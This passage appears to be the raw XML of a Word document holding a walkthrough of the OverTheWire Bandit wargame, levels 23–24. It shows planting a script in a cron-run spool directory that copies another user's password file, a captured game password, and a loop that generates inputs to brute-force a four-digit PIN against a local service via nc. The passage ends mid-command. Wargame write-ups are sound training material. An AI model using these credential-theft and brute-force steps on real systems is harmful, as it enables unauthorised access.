          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>myname=$(whoami)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704D3F54" w14:textId="77777777" w:rsidR="00C7426E" w:rsidRPr="00C7426E" w:rsidRDefault="00C7426E" w:rsidP="00C7426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7426E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cd /var/spool/$myname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E83682F" w14:textId="77777777" w:rsidR="00C7426E" w:rsidRPr="00C7426E" w:rsidRDefault="00C7426E" w:rsidP="00C7426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7426E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>echo "Executing and deleting all scripts in /var/spool/$myname:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7240B7DA" w14:textId="77777777" w:rsidR="00C7426E" w:rsidRPr="00C7426E" w:rsidRDefault="00C7426E" w:rsidP="00C7426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7426E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>for i in * .*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DA0BCD" w14:textId="77777777" w:rsidR="00C7426E" w:rsidRPr="00C7426E" w:rsidRDefault="00C7426E" w:rsidP="00C7426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7426E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430376A3" w14:textId="77777777" w:rsidR="00C7426E" w:rsidRPr="00C7426E" w:rsidRDefault="00C7426E" w:rsidP="00C7426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7426E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">    if [ "$i" != "." -a "$i" != ".." ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EB29C5" w14:textId="77777777" w:rsidR="00C7426E" w:rsidRPr="00C7426E" w:rsidRDefault="00C7426E" w:rsidP="00C7426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7426E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">    then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AE739C" w14:textId="77777777" w:rsidR="00C7426E" w:rsidRPr="00C7426E" w:rsidRDefault="00C7426E" w:rsidP="00C7426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7426E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">        echo "Handling $i"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D960A0D" w14:textId="77777777" w:rsidR="00C7426E" w:rsidRPr="00C7426E" w:rsidRDefault="00C7426E" w:rsidP="00C7426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7426E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">        timeout -s 9 60 ./$i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600C8184" w14:textId="77777777" w:rsidR="00C7426E" w:rsidRPr="00C7426E" w:rsidRDefault="00C7426E" w:rsidP="00C7426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7426E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">        rm -f ./$i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD19B43" w14:textId="77777777" w:rsidR="00C7426E" w:rsidRPr="00C7426E" w:rsidRDefault="00C7426E" w:rsidP="00C7426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7426E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">    fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3DC501" w14:textId="6457DE38" w:rsidR="00726B74" w:rsidRDefault="00C7426E" w:rsidP="00C7426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7426E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F4F87E" w14:textId="65EDADB2" w:rsidR="00C7426E" w:rsidRDefault="00C7426E" w:rsidP="00C7426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4EE2AB80" w14:textId="0EC188BD" w:rsidR="00640A06" w:rsidRDefault="00640A06" w:rsidP="00640A06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This script execute all the files that are not . or .. in the folder /var/spool/bandit24.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6520C929" w14:textId="3290B2F0" w:rsidR="00640A06" w:rsidRDefault="00640A06" w:rsidP="00640A06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I created a new file with the following string “cat /etc/bandit_pass/bandit24 &gt; /tmp/bandit24Password” (copy bandit24’s password to another file) using the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7427C6EF" w14:textId="647E3300" w:rsidR="00640A06" w:rsidRPr="00640A06" w:rsidRDefault="00640A06" w:rsidP="00640A06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640A06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>echo “cat /etc/bandit_pass/bandit24 &gt; /tmp/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>24pass</w:t>
      </w:r>
      <w:r w:rsidRPr="00640A06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>” &gt; /var/spool/bandit24</w:t>
      </w:r>
      <w:r w:rsidR="00864008">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>/samuel.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687175E4" w14:textId="78B95388" w:rsidR="00B36B81" w:rsidRDefault="00B36B81" w:rsidP="009509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78C675E0" w14:textId="32F5F8AB" w:rsidR="00864008" w:rsidRDefault="00864008" w:rsidP="009509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After a minute I entered the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00864008">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat /tmp/24pass</w:t>
      </w:r>
      <w:r w:rsidRPr="00864008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>and got the following output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2151885F" w14:textId="66672B73" w:rsidR="00864008" w:rsidRDefault="00864008" w:rsidP="009509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864008">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>cat: /tmp/24pass: Is a directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFAC34E" w14:textId="152349BA" w:rsidR="00864008" w:rsidRDefault="00864008" w:rsidP="009509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05D01581" w14:textId="5C8CCA21" w:rsidR="00864008" w:rsidRDefault="009E4155" w:rsidP="009509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with the command </w:t>
      </w:r>
      <w:r w:rsidRPr="009E4155">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>ls /tmp/24pass</w:t>
      </w:r>
      <w:r w:rsidRPr="009E4155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>I saw there are 2 files inside the folder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20334A01" w14:textId="410B69CD" w:rsidR="009E4155" w:rsidRDefault="009E4155" w:rsidP="009E415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Level24 = a file that contains the password to the next level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D863E7A" w14:textId="5013DA36" w:rsidR="009E4155" w:rsidRDefault="009E4155" w:rsidP="009E415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Script.sh = a file that contains the script that I wrote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A72E79" w14:textId="3CAE9E2A" w:rsidR="009E4155" w:rsidRDefault="009E4155" w:rsidP="009E415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11F692AB" w14:textId="25CB04EC" w:rsidR="009E4155" w:rsidRDefault="009E4155" w:rsidP="009E415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For displaying the next level password, I entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="009E4155">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat /tmp/24pass/level24</w:t>
      </w:r>
      <w:r w:rsidRPr="009E4155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 xml:space="preserve">and got the output: </w:t>
      </w:r>
      <w:r w:rsidRPr="009E4155">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78888D99" w14:textId="29AD2BCE" w:rsidR="001B26F8" w:rsidRDefault="001B26F8" w:rsidP="009E415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2C8A1D8B" w14:textId="77777777" w:rsidR="009D7B0D" w:rsidRDefault="009D7B0D" w:rsidP="009E415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</w:p>
    <w:p w14:paraId="4462230C" w14:textId="11AFFC4C" w:rsidR="001B26F8" w:rsidRPr="006C320F" w:rsidRDefault="001B26F8" w:rsidP="006C320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1B26F8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bandit24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E14C78" w14:textId="085C7690" w:rsidR="00BF3444" w:rsidRDefault="00BF3444" w:rsidP="009E415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First, I needed to create server </w:t>
      </w:r>
      <w:r w:rsidR="006C320F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">all </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>possible inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4872C6EC" w14:textId="045FA0D8" w:rsidR="00BF3444" w:rsidRDefault="00BF3444" w:rsidP="009E415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For that I used the commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C6B526" w14:textId="77777777" w:rsidR="00BF3444" w:rsidRDefault="00BF3444" w:rsidP="00BF344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1A26D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>mkdir /tmp/24Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19202815" w14:textId="77777777" w:rsidR="00BF3444" w:rsidRPr="001A26D6" w:rsidRDefault="00BF3444" w:rsidP="00BF344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>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cd /tmp/24Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AA4114" w14:textId="14DF3D31" w:rsidR="00BF3444" w:rsidRPr="006C320F" w:rsidRDefault="00BF3444" w:rsidP="006C320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1A26D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>nano</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> serverInputCreator</w:t>
      </w:r>
      <w:r w:rsidRPr="001A26D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AE2AFC" w14:textId="5A6331E2" w:rsidR="00BF3444" w:rsidRDefault="006C320F" w:rsidP="00BF344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then, e</w:t>
      </w:r>
      <w:r w:rsidR="00BF3444">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ntered the following script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9D12F1" w14:textId="43E58864" w:rsidR="00771220" w:rsidRPr="00BF3444" w:rsidRDefault="00771220" w:rsidP="00BF344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523B53">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2904EF58" w14:textId="07F1B586" w:rsidR="00771220" w:rsidRPr="00523B53" w:rsidRDefault="00771220" w:rsidP="0077122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523B53">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>for i in {0000..</w:t>
      </w:r>
      <w:r w:rsidR="00295AE0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5000</w:t>
      </w:r>
      <w:r w:rsidRPr="00523B53">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5EBD1D" w14:textId="77777777" w:rsidR="00771220" w:rsidRPr="00523B53" w:rsidRDefault="00771220" w:rsidP="0077122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523B53">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7689D993" w14:textId="5ECD89E7" w:rsidR="00771220" w:rsidRPr="00523B53" w:rsidRDefault="00771220" w:rsidP="0077122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523B53">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">        echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" &gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidR="006C320F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>input</w:t>
      </w:r>
      <w:r w:rsidR="00295AE0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D92FCD" w14:textId="3A7A42A1" w:rsidR="009D7B0D" w:rsidRDefault="00771220" w:rsidP="0077122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523B53">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5AE710" w14:textId="5D5F4314" w:rsidR="00295AE0" w:rsidRDefault="00295AE0" w:rsidP="0077122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6B510D38" w14:textId="2F28FDD8" w:rsidR="00295AE0" w:rsidRPr="00523B53" w:rsidRDefault="00295AE0" w:rsidP="00295AE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523B53">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>for i in {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5000</w:t>
      </w:r>
      <w:r w:rsidRPr="00523B53">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9999</w:t>
      </w:r>
      <w:r w:rsidRPr="00523B53">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7514DB" w14:textId="77777777" w:rsidR="00295AE0" w:rsidRPr="00523B53" w:rsidRDefault="00295AE0" w:rsidP="00295AE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523B53">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ADE49B" w14:textId="5850ACE7" w:rsidR="00295AE0" w:rsidRPr="00523B53" w:rsidRDefault="00295AE0" w:rsidP="00295AE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523B53">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">        echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" &gt;&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>input</w:t>
      </w:r>
      <w:r w:rsidR="0030771F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F280059" w14:textId="77777777" w:rsidR="00295AE0" w:rsidRPr="00523B53" w:rsidRDefault="00295AE0" w:rsidP="00295AE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523B53">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9D3042" w14:textId="77777777" w:rsidR="00295AE0" w:rsidRPr="00523B53" w:rsidRDefault="00295AE0" w:rsidP="0077122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707C63DF" w14:textId="3471DB6C" w:rsidR="00326CF9" w:rsidRDefault="00326CF9" w:rsidP="009E415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0EFB8891" w14:textId="29473BFF" w:rsidR="00973CEE" w:rsidRDefault="00BF3444" w:rsidP="009E415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changed the file permission </w:t>
      </w:r>
      <w:r w:rsidR="006C320F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">(add execute permission) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>with the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7492F74B" w14:textId="5C8C7E89" w:rsidR="00973CEE" w:rsidRPr="006C320F" w:rsidRDefault="00523B53" w:rsidP="006C320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>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>chmod 777 serverInputCreator.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F2BA65" w14:textId="2CD56E78" w:rsidR="009D7B0D" w:rsidRDefault="006C320F" w:rsidP="006C320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>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">and execute it: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C320F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>./serverInputCreator.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED2EAF4" w14:textId="533B3819" w:rsidR="006C320F" w:rsidRDefault="006C320F" w:rsidP="006C320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21E3F2DF" w14:textId="6EB7B8E3" w:rsidR="006C320F" w:rsidRDefault="000B3EF4" w:rsidP="006C320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now the file</w:t>
      </w:r>
      <w:r w:rsidR="0030771F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005718B8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>input</w:t>
      </w:r>
      <w:r w:rsidR="0030771F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidR="0030771F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="0030771F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>input2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains the server’s input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67523727" w14:textId="77777777" w:rsidR="00DC74F9" w:rsidRDefault="000B3EF4" w:rsidP="00530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I entered the command</w:t>
      </w:r>
      <w:r w:rsidR="00DC74F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04008054" w14:textId="5CD7529F" w:rsidR="00DC74F9" w:rsidRDefault="000B3EF4" w:rsidP="00530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1250FA">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>nc localhost 30002 &lt; input</w:t>
      </w:r>
      <w:r w:rsidR="00DC74F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="001250FA">
        <w:rPr>
